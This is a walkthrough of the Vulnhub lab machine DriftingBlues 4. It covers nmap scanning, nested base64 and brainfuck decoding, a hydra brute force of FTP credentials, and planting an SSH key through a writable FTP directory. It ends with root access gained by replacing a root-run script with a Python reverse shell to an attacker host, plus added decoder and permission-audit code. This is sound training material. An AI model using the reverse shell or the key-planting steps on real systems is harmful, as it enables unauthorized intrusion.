Vulnhub: Driftingblues 4 box, detailed walkthrough

Author: jason_huawen

Basic information about the box

Name: DriftingBlues: 4

Address: https://www.vulnhub.com/entry/driftingblues-4,661/

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3/Driftingblue4]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.60.0/16   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor
 192.168.56.100  08:00:27:89:65:85      1      60  PCS Systemtechnik GmbH
 192.168.56.193  08:00:27:de:58:ca      1      60  PCS Systemtechnik GmbH

Kali Linux's built-in netdiscover tool identifies the target host's IP address as 192.168.56.193

NMAP scan

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3/Driftingblue4]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.193 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-19 05:19 EST
Nmap scan report for bogon (192.168.56.193)
Host is up (0.000083s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
|   256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_  256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:DE:58:CA (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.98 seconds
                                                                 

The NMAP scan shows three open ports on the target host: 21 (FTP), 22 (SSH) and 80 (HTTP)

Get Access

                                                                                                                                                                                                                                   
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3/Driftingblue4]
└─$ ftp 192.168.56.193                                         
Connected to 192.168.56.193.
220 ProFTPD Server (driftingblues) [::ffff:192.168.56.193]
Name (192.168.56.193:kali): anonymous
331 Password required for anonymous
Password: 
530 Login incorrect.
ftp: Login failed
ftp> quit
221 Goodbye.
                 

The target's FTP service does not permit anonymous logins, and its version could not be determined, so it is set aside for now.

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3/Driftingblue4]
└─$ curl http://192.168.56.193/                                     
<!DOCTYPE html>
<html>
<body>
<h1 class="aligncenter">Under Construction</h1>
<p class="aligncenter">please stand by</p>
<style>
.aligncenter {
    text-align: center;
}
</style>

<!--Z28gYmFjayBpbnRydWRlciEhISBkR2xuYUhRZ2MyVmpkWEpwZEhrZ1pISnBjSEJwYmlCaFUwSnZZak5DYkVsSWJIWmtVMlI1V2xOQ2FHSnBRbXhpV0VKellqTnNiRnBUUWsxTmJYZ3dWMjAxVjJGdFJYbGlTRlpoVFdwR2IxZHJUVEZOUjFaSlZWUXdQUT09-->
</body>
</html>                 

The source of the returned page contains a comment; decode it:

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3/Driftingblue4]
└─$ echo "Z28gYmFjayBpbnRydWRlciEhISBkR2xuYUhRZ2MyVmpkWEpwZEhrZ1pISnBjSEJwYmlCaFUwSnZZak5DYkVsSWJIWmtVMlI1V2xOQ2FHSnBRbXhpV0VKellqTnNiRnBUUWsxTmJYZ3dWMjAxVjJGdFJYbGlTRlpoVFdwR2IxZHJUVEZOUjFaSlZWUXdQUT09" | base64 -d
go back intruder!!! dGlnaHQgc2VjdXJpdHkgZHJpcHBpbiBhU0JvYjNCbElIbHZkU2R5WlNCaGJpQmxiWEJzYjNsbFpTQk1NbXgwV201V2FtRXliSFZhTWpGb1drTTFNR1ZJVVQwPQ==                                                                                                                                                                                                                                   
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3/Driftingblue4]
└─$ echo "dGlnaHQgc2VjdXJpdHkgZHJpcHBpbiBhU0JvYjNCbElIbHZkU2R5WlNCaGJpQmxiWEJzYjNsbFpTQk1NbXgwV201V2FtRXliSFZhTWpGb1drTTFNR1ZJVVQwPQ==" | base64 -d                                                                    
tight security drippin aSBob3BlIHlvdSdyZSBhbiBlbXBsb3llZSBMMmx0Wm5WamEybHVaMjFoWkM1MGVIUT0=                                                                                                                                                                                                                                   
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3/Driftingblue4]
└─$ echo "aSBob3BlIHlvdSdyZSBhbiBlbXBsb3llZSBMMmx0Wm5WamEybHVaMjFoWkM1MGVIUT0=" | base64 -d                                                        
i hope you're an employee L2ltZnVja2luZ21hZC50eHQ=                                                                                                                                                                                                                                   
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3/Driftingblue4]
└─$ echo "L2ltZnVja2luZ21hZC50eHQ=" | base64 -d                                            
/imfuckingmad.txt    

The data is encoded in several layers, so several rounds of decoding are needed before it yields the file name /imfuckingmad.txt. Download that file to the local Kali Linux machine.
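As an added example (not part of the original write-up), a small Python decoder that peels such nested layers automatically: at each layer it keeps the human-readable prefix and feeds the trailing base64 token into the next round, stopping when nothing decodes further. PAGE_COMMENT is the comment string taken from the page's HTML source; build_sample() constructs further test inputs of the same shape.

```python
import base64
import binascii
import re
from typing import List, Optional, Tuple

# Comment string recovered from the page's HTML source (L85 of the walkthrough).
PAGE_COMMENT = (
    "Z28gYmFjayBpbnRydWRlciEhISBkR2xuYUhRZ2MyVmpkWEpwZEhrZ1pISnBjSEJwYmlCaFUw"
    "SnZZak5DYkVsSWJIWmtVMlI1V2xOQ2FHSnBRbXhpV0VKellqTnNiRnBUUWsxTmJYZ3dWMjAx"
    "VjJGdFJYbGlTRlpoVFdwR2IxZHJUVEZOUjFaSlZWUXdQUT09"
)

_B64_ALPHABET = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def decode_token(token: str) -> Optional[str]:
    """Strictly decode one base64 token into printable UTF-8 text, else None.

    The strictness (alphabet, length multiple of 4, printable result) is what
    keeps an ordinary last word such as "home" from being mistaken for a layer."""
    if len(token) % 4 or not _B64_ALPHABET.match(token):
        return None
    try:
        text = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def peel_layers(blob: str, max_depth: int = 16) -> Tuple[List[str], str]:
    """Decode layer by layer.

    Each layer has the shape "<message> <base64 of the next layer>"; the
    innermost layer is plain text (on this box, a file path). Returns the
    per-layer messages and the final payload. max_depth bounds the loop so a
    blob that keeps decoding to itself cannot spin forever."""
    messages: List[str] = []
    current = blob.strip()
    for _ in range(max_depth):
        decoded = decode_token(current)
        if decoded is None:
            break  # current is already the innermost plain-text payload
        head, _, tail = decoded.rpartition(" ")
        if head and decode_token(tail) is not None:
            messages.append(head)
            current = tail
        else:
            current = decoded
            break
    return messages, current


def build_sample(messages: List[str], payload: str) -> str:
    """Constructed helper: wrap payload in one layer per message, innermost last."""
    blob = base64.b64encode(payload.encode()).decode()
    for msg in reversed(messages):
        blob = base64.b64encode(f"{msg} {blob}".encode()).decode()
    return blob


if __name__ == "__main__":
    hints, path = peel_layers(PAGE_COMMENT)
    for depth, hint in enumerate(hints, 1):
        print(f"layer {depth}: {hint}")
    print(f"payload: {path}")
```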

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3/Driftingblue4]
└─$ cat imfuckingmad.txt                       
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3/Driftingblue4]
└─$ 

The file's content, a long stream of the characters + - < > [ ] and . with a space after every five of them, should be brainfuck code. Decoding it with the online service

https://www.splitbrain.org/services/ook

gives:

man we are a tech company and still getting hacked??? what the shit??? enough is enough!!! 
#
##
##
##
##
##
##
##
##
#

/iTiS3Cr3TbiTCh.png
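The decode can also be done offline instead of pasting the file into a web service. The interpreter below is an added example, not the author's code: it ignores every character outside the eight brainfuck commands (so the five-character spacing of imfuckingmad.txt needs no clean-up), uses 8-bit wrapping cells, precomputes the bracket jumps, and aborts on unbalanced brackets or a runaway loop. HELLO and HELLO_SPACED are constructed programs, the second laid out in the same spaced format as the file from the box.

```python
from typing import Dict, List

# Constructed program: prints "Hi\n" (cells 72, 105, 10).
HELLO = "++++++++[>+++++++++<-]>.>++++++++++[>++++++++++<-]>+++++.>++++++++++."
# The same program re-laid out the way imfuckingmad.txt is: five commands, a space.
HELLO_SPACED = " ".join(HELLO[i:i + 5] for i in range(0, len(HELLO), 5))

COMMANDS = "+-<>[].,"


def _match_brackets(code: List[str]) -> Dict[int, int]:
    """Map every '[' to its ']' and back; reject unbalanced programs up front."""
    jumps: Dict[int, int] = {}
    stack: List[int] = []
    for i, c in enumerate(code):
        if c == "[":
            stack.append(i)
        elif c == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at command {i}")
            j = stack.pop()
            jumps[i], jumps[j] = j, i
    if stack:
        raise ValueError(f"unmatched '[' at command {stack[-1]}")
    return jumps


def bf_run(program: str, tape_size: int = 30000, max_steps: int = 10_000_000) -> str:
    """Run a brainfuck program with no stdin and return its output as text.

    Cells are unsigned bytes that wrap, as in the common implementations and
    the online decoder used above. Output bytes are returned via latin-1 so
    every byte value maps to exactly one character."""
    code = [c for c in program if c in COMMANDS]  # drop spacing, newlines, comments
    jumps = _match_brackets(code)
    tape = bytearray(tape_size)
    out = bytearray()
    ptr = pc = steps = 0
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step budget exhausted; program does not seem to terminate")
        c = code[pc]
        if c == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif c == ">":
            ptr += 1
            if ptr >= tape_size:
                raise IndexError("data pointer ran off the right end of the tape")
        elif c == "<":
            ptr -= 1
            if ptr < 0:
                raise IndexError("data pointer ran off the left end of the tape")
        elif c == ".":
            out.append(tape[ptr])
        elif c == ",":
            tape[ptr] = 0  # no input available: treat a read as EOF -> 0
        elif c == "[" and tape[ptr] == 0:
            pc = jumps[pc]  # skip the loop body; pc += 1 below lands after ']'
        elif c == "]" and tape[ptr] != 0:
            pc = jumps[pc]  # back to the matching '['; pc += 1 re-enters the body
        pc += 1
    return out.decode("latin-1")


if __name__ == "__main__":
    import sys
    # Pass the downloaded file on the command line to decode it locally.
    src = open(sys.argv[1]).read() if len(sys.argv) > 1 else HELLO_SPACED
    print(bf_run(src), end="")
```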

This is an image file; download it to the local Kali Linux machine.

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3/Driftingblue4]
└─$ wget http://192.168.56.193/iTiS3Cr3TbiTCh.png
--2022-11-19 05:29:37--  http://192.168.56.193/iTiS3Cr3TbiTCh.png
Connecting to 192.168.56.193:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12119 (12K) [image/png]
Saving to: ‘iTiS3Cr3TbiTCh.png’

iTiS3Cr3TbiTCh.png                                       100%[=================================================================================================================================>]  11.83K  --.-KB/s    in 0s      

2022-11-19 05:29:37 (577 MB/s) - ‘iTiS3Cr3TbiTCh.png’ saved [12119/12119]

                                                                                                                                                                                                                                   
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3/Driftingblue4]
└─$ ls 
imfuckingmad.txt  iTiS3Cr3TbiTCh.png  nmap_full_scan
                                                                                                                                                                                                                                   
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3/Driftingblue4]
└─$ steghide extract -sf iTiS3Cr3TbiTCh.png                    
Enter passphrase: 
                                                                                                                                                                                                                                   
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3/Driftingblue4]
└─$ stegseek  iTiS3Cr3TbiTCh.png /usr/share/wordlists/rockyou.txt 
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[!] error: the file format of the file "iTiS3Cr3TbiTCh.png" is not supported.

Analysis with steghide and similar tools failed, but simply opening the image in a graphical viewer shows that it is a QR code. Decode it with an online QR code reader:

https://uutool.cn/qrcode-decode/

The decoded result is:

https://i.imgur.com/a4JjS76.png

Download that image to the local Kali Linux machine; it contains the following:

Dear:
luther
gary
hubert
clark


please fix our website soon

It is not clear whether these are usernames; requesting them as directory names returned not found, so turn these words into a username wordlist and try cracking FTP with it?

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue4]
└─$ hydra -L userlist -P /usr/share/wordlists/rockyou.txt ftp://192.168.56.193
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-19 05:54:30
[DATA] max 16 tasks per 1 server, overall 16 tasks, 57377596 login tries (l:4/p:14344399), ~3586100 tries per task
[DATA] attacking ftp://192.168.56.193:21/
[STATUS] 426.00 tries/min, 426 tries in 00:01h, 57377170 to do in 2244:49h, 16 active
[STATUS] 423.00 tries/min, 1269 tries in 00:03h, 57376327 to do in 2260:42h, 16 active
[21][ftp] host: 192.168.56.193   login: luther   password: mypics

We have successfully cracked one user's password; use it to log in to FTP (note: hydra never managed to crack the other users' passwords, but that does not matter)

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue4]
└─$ ftp 192.168.56.193                                                                                               
Connected to 192.168.56.193.
220 ProFTPD Server (driftingblues) [::ffff:192.168.56.193]
Name (192.168.56.193:kali): luther
331 Password required for luther
Password: 
230 User luther logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||60665|)
150 Opening ASCII mode data connection for file list
drwxrwxrwx   2 1001     1001         4096 Jan  9  2021 hubert
-rw-r--r--   1 root     root           50 Nov 19 11:01 sync_log
226 Transfer complete
ftp> ls -alh
229 Entering Extended Passive Mode (|||58983|)
150 Opening ASCII mode data connection for file list
drwxrwxrwx   3 root     root         4.0k Jan  9  2021 .
drwxrwxrwx   3 root     root         4.0k Jan  9  2021 ..
drwxrwxrwx   2 1001     1001         4.0k Jan  9  2021 hubert
-rw-r--r--   1 root     root           50 Nov 19 11:01 sync_log
226 Transfer complete
ftp> get sync_log
local: sync_log remote: sync_log
229 Entering Extended Passive Mode (|||36670|)
150 Opening BINARY mode data connection for sync_log (50 bytes)
    50        2.97 MiB/s 
226 Transfer complete
50 bytes received in 00:00 (113.55 KiB/s)
ftp> cd hubert
250 CWD command successful
ftp> ls -alh
229 Entering Extended Passive Mode (|||32865|)
150 Opening ASCII mode data connection for file list
drwxrwxrwx   2 1001     1001         4.0k Jan  9  2021 .
drwxrwxrwx   3 root     root         4.0k Jan  9  2021 ..
226 Transfer complete

The downloaded sync_log does not seem to be of any use, though

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue4]
└─$ cat sync_log              
sync completed at Sat 19 Nov 2022 05:01:01 AM CST

However, the hubert directory on the FTP server is both readable and writable, so we can try to get a public key onto the target: generate a key pair locally, then upload the public key into the hubert directory on the target host.

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue4]
└─$ ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): /home/kali/Vulnhub/Driftingblue4/.ssh/id_rsa
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/kali/Vulnhub/Driftingblue4/.ssh/id_rsa
Your public key has been saved in /home/kali/Vulnhub/Driftingblue4/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:d2XCUK94iiTBBfWmy0tFApHnCw1YmvFdhqF15J2vi20 kali@kali
The key's randomart image is:
+---[RSA 3072]----+
|    .o===+*..    |
|    .*o*o* + o   |
|    o ==o = = +  |
|      ..o= . *   |
|      ..S.+ + .  |
|       +.= + .   |
|        = . .    |
|       . . oE.   |
|        . ..o    |
+----[SHA256]-----+
                                                                                                                                                                                                                                   
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue4]
└─$ ls
hydra.restore  imfuckingmad.txt  iTiS3Cr3TbiTCh.png  nmap_full_scan  results  sync_log  test  userlist
                                                                                                                                                                                                                                   
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue4]
└─$ ls -alh
total 148M
drwxr-xr-x  4 kali kali 4.0K Nov 19 06:25 .
drwxr-xr-x 56 kali kali 4.0K Nov 19 05:38 ..
-rw-r--r--  1 kali kali 148M Nov 19 06:24 hydra.restore
-rw-r--r--  1 kali kali 6.7K Jan  9  2021 imfuckingmad.txt
-rw-r--r--  1 kali kali  12K Jan  9  2021 iTiS3Cr3TbiTCh.png
-rw-r--r--  1 root root 1022 Nov 19 05:19 nmap_full_scan
drwxr-xr-x  3 kali kali 4.0K Nov 19 05:32 results
drwxr-xr-x  2 kali kali 4.0K Nov 19 06:26 .ssh
-rw-r--r--  1 kali kali   50 Nov 19 06:01 sync_log
-rw-r--r--  1 kali kali    5 Nov 19 06:18 test
-rw-r--r--  1 kali kali   25 Nov 19 05:53 userlist
                                                                                                                                                                                                                                   
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue4]
└─$ cd .ssh
                                                                                                                                                                                                                                   
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue4/.ssh]
└─$ ls -alh
total 16K
drwxr-xr-x 2 kali kali 4.0K Nov 19 06:26 .
drwxr-xr-x 4 kali kali 4.0K Nov 19 06:25 ..
-rw------- 1 kali kali 2.6K Nov 19 06:26 id_rsa
-rw-r--r-- 1 kali kali  563 Nov 19 06:26 id_rsa.pub
                                                                                                                                                                                                                                   
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue4/.ssh]
└─$ mv id_rsa.pub authorized_keys
                                                                                                                                                                                                                                   
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue4/.ssh]
└─$ ls -alh
total 16K
drwxr-xr-x 2 kali kali 4.0K Nov 19 06:27 .
drwxr-xr-x 4 kali kali 4.0K Nov 19 06:25 ..
-rw-r--r-- 1 kali kali  563 Nov 19 06:26 authorized_keys
-rw------- 1 kali kali 2.6K Nov 19 06:26 id_rsa
                                                 

The key point is that the public key must be renamed authorized_keys, otherwise authentication fails; this is presumably down to the sshd_config on the target (sshd reads ~/.ssh/authorized_keys by default). To upload the key over FTP, the .ssh directory must first be created on the target.

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue4/.ssh]
└─$ ftp 192.168.56.193                                                                                               
Connected to 192.168.56.193.
220 ProFTPD Server (driftingblues) [::ffff:192.168.56.193]
Name (192.168.56.193:kali): luther
331 Password required for luther
Password: 
230 User luther logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||44483|)
150 Opening ASCII mode data connection for file list
drwxrwxrwx   3 root     root         4.0k Nov 19 11:19 .
drwxrwxrwx   3 root     root         4.0k Nov 19 11:19 ..
drwxrwxrwx   2 1001     1001         4.0k Nov 19 11:14 hubert
-rw-r--r--   1 root     root           50 Nov 19 11:29 sync_log
-rw-r--r--   1 luther   luther          5 Nov 19 11:19 test
226 Transfer complete
ftp> cd hubert
250 CWD command successful
ftp> ls -alh
229 Entering Extended Passive Mode (|||34303|)
150 Opening ASCII mode data connection for file list
drwxrwxrwx   2 1001     1001         4.0k Nov 19 11:14 .
drwxrwxrwx   3 root     root         4.0k Nov 19 11:19 ..
226 Transfer complete
ftp> mkdir .ssh
257 "/hubert/.ssh" - Directory successfully created
ftp> cd .ssh
250 CWD command successful
ftp> ls -alh
229 Entering Extended Passive Mode (|||2072|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x   2 luther   luther       4.0k Nov 19 11:29 .
drwxrwxrwx   3 1001     1001         4.0k Nov 19 11:29 ..
226 Transfer complete
ftp> put authorized_keys 
local: authorized_keys remote: authorized_keys
229 Entering Extended Passive Mode (|||62864|)
150 Opening BINARY mode data connection for authorized_keys
100% |**************************************************************************************************************************************************************************************|   563       23.34 MiB/s    00:00 ETA
226 Transfer complete
563 bytes sent in 00:00 (1.05 MiB/s)
ftp> ls -alh
229 Entering Extended Passive Mode (|||40759|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x   2 luther   luther       4.0k Nov 19 11:29 .
drwxrwxrwx   3 1001     1001         4.0k Nov 19 11:29 ..
-rw-r--r--   1 luther   luther        563 Nov 19 11:29 authorized_keys
226 Transfer complete
ftp> 

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue4/.ssh]
└─$ ssh -i id_rsa hubert@192.168.56.193 
hubert@192.168.56.193: Permission denied (publickey).
                                                                                                                                                                                                                                   
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue4/.ssh]
└─$ chmod 400 id_rsa 
                                                                                                                                                                                                                                   
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue4/.ssh]
└─$ ssh -i id_rsa hubert@192.168.56.193
Linux driftingblues 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
hubert@driftingblues:~$ id
uid=1001(hubert) gid=1001(hubert) groups=1001(hubert)
hubert@driftingblues:~$ 

Successfully obtained a shell as hubert

(The writable hubert directory had in fact been spotted at the beginning, but the attempt failed because the public key had not been renamed.)

hubert@driftingblues:~$ ls -alh
total 32K
drwx------ 4 hubert hubert 4.0K Nov 19 05:31 .
drwxr-xr-x 4 root   root   4.0K Jan  9  2021 ..
-rwx------ 1 hubert hubert    1 Nov 19 05:31 .bash_history
-rwx------ 1 hubert hubert    1 Nov 19 05:31 .bashrc
-rwxr-xr-x 1 root   root    217 Jan  9  2021 emergency.py
drwx------ 3 hubert hubert 4.0K Nov 19 05:30 .gnupg
drwx------ 2 hubert hubert 4.0K Nov 19 05:30 .ssh
-rwx------ 1 hubert hubert 1.8K Jan  3  2021 user.txt
hubert@driftingblues:~$ cat user.txt
flag 1/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░░░░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░░▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█



hubert@driftingblues:~$ 

The user flag is obtained

Privilege escalation

Upload the linpeas.sh script to the target's /tmp directory, change its permissions, and run it

hubert@driftingblues:~$ cat .bash_history 

hubert@driftingblues:~$ cat emergency.py 
#!/usr/bin/python

import os

os.system('echo 1 >> /tmp/backdoor_testing')

# template python script for backdoor purposes
# i'm gonna leave it with loose permissions
# 
#
#
#
#
#
#
#
#
#
#
#
# say africa without a's
hubert@driftingblues:~$ 

Checking the contents of /tmp/backdoor_testing shows that emergency.py is being executed repeatedly, and as root, so we can create a script of the same name, emergency.py, to obtain a shell

hubert@driftingblues:~$ nano emergency.py
hubert@driftingblues:~$ cat emergency.py
#!/usr/bin/python

import os
import socket,subprocess
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.56.137",6666));os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

That is, delete the original emergency.py and create a Python script with the same name in its place; this gives us a reverse shell, and the shell runs as root
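Both weaknesses chained on this box are ownership problems: the directory reachable over FTP belongs to hubert and accepts an .ssh/authorized_keys from another user, and the root-run emergency.py sits in a directory owned by a non-root user, so the file can be deleted and replaced however root-owned and 0755 it is. As an added example (not code from the box or the write-up), the audit below applies one rule to both cases, the rule sshd's StrictModes enforces on authorized_keys: every path component must be owned by root or the trusted user and none may be group/other-writable (sticky directories excepted). The component lists are constructed from the page's ls listings; the FTP root path /srv/ftp and luther's uid 1002 are assumptions.

```python
import stat
from pathlib import Path
from typing import List, Tuple

# One path component: (path, owner uid, st_mode including the file-type bits).
Component = Tuple[str, int, int]


def unsafe_components(chain: List[Component], trusted_uid: int) -> List[str]:
    """One finding per component that someone other than root or trusted_uid
    could modify or replace.

    A file is only as safe as its weakest ancestor: whoever can write a
    directory can unlink a file in it and drop a new one in its place,
    whatever the file's own owner and mode say."""
    findings: List[str] = []
    for path, uid, mode in chain:
        if uid not in (0, trusted_uid):
            findings.append(f"{path}: owned by uid {uid}, who can replace it")
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            # Sticky directories such as /tmp let anyone create entries but only
            # the owner remove them, so they do not allow swapping a file.
            if stat.S_ISDIR(mode) and mode & stat.S_ISVTX:
                continue
            findings.append(f"{path}: group/other-writable (mode {oct(mode & 0o7777)})")
    return findings


def chain_from_fs(path: str) -> List[Component]:
    """Collect the component chain from a live filesystem, top down."""
    target = Path(path).resolve()
    parts = [target, *target.parents]  # leaf first, so reverse below
    return [(str(p), p.stat().st_uid, p.stat().st_mode) for p in reversed(parts)]


D, F = stat.S_IFDIR, stat.S_IFREG

# Scenario 1: the root-executed script, from `ls -alh` in hubert's home (uid 1001).
EMERGENCY_PY: List[Component] = [
    ("/", 0, D | 0o755),
    ("/home", 0, D | 0o755),                      # ".." was drwxr-xr-x root root
    ("/home/hubert", 1001, D | 0o700),            # drwx------ hubert hubert
    ("/home/hubert/emergency.py", 0, F | 0o755),  # -rwxr-xr-x root root
]

# Scenario 2: the key planted over FTP, from the ftp `ls -alh` output.
# /srv/ftp is an assumed path for the FTP root; 1002 is an assumed uid for luther.
FTP_AUTHORIZED_KEYS: List[Component] = [
    ("/srv/ftp", 0, D | 0o777),                                 # drwxrwxrwx root root
    ("/srv/ftp/hubert", 1001, D | 0o777),                       # drwxrwxrwx 1001 1001
    ("/srv/ftp/hubert/.ssh", 1002, D | 0o755),                  # drwxr-xr-x luther luther
    ("/srv/ftp/hubert/.ssh/authorized_keys", 1002, F | 0o644),  # -rw-r--r-- luther luther
]

# Scenario 3: the same key material once only hubert (and root) control the path.
HARDENED_AUTHORIZED_KEYS: List[Component] = [
    ("/", 0, D | 0o755),
    ("/home", 0, D | 0o755),
    ("/home/hubert", 1001, D | 0o700),
    ("/home/hubert/.ssh", 1001, D | 0o700),
    ("/home/hubert/.ssh/authorized_keys", 1001, F | 0o600),
]

if __name__ == "__main__":
    cases = [("emergency.py, executed as root", EMERGENCY_PY, 0),
             ("authorized_keys for hubert, via FTP", FTP_AUTHORIZED_KEYS, 1001),
             ("authorized_keys for hubert, hardened", HARDENED_AUTHORIZED_KEYS, 1001)]
    for name, chain, uid in cases:
        print(f"[{name}]")
        for finding in unsafe_components(chain, uid) or ["no findings"]:
            print("  " + finding)
```

For a live host, `unsafe_components(chain_from_fs("/home/hubert/emergency.py"), 0)` performs the same check against the real filesystem.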

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue4]
└─$ sudo nc -nlvp 6666                                         
[sudo] password for kali: 
listening on [any] 6666 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.193] 45518
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# python -c 'import pty;pty.spawn("/bin/bash")'
root@driftingblues:~# ls
ls
root.txt  sync
root@driftingblues:~# cat root.txt
cat root.txt
flag 2/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░▐▌░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░█▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
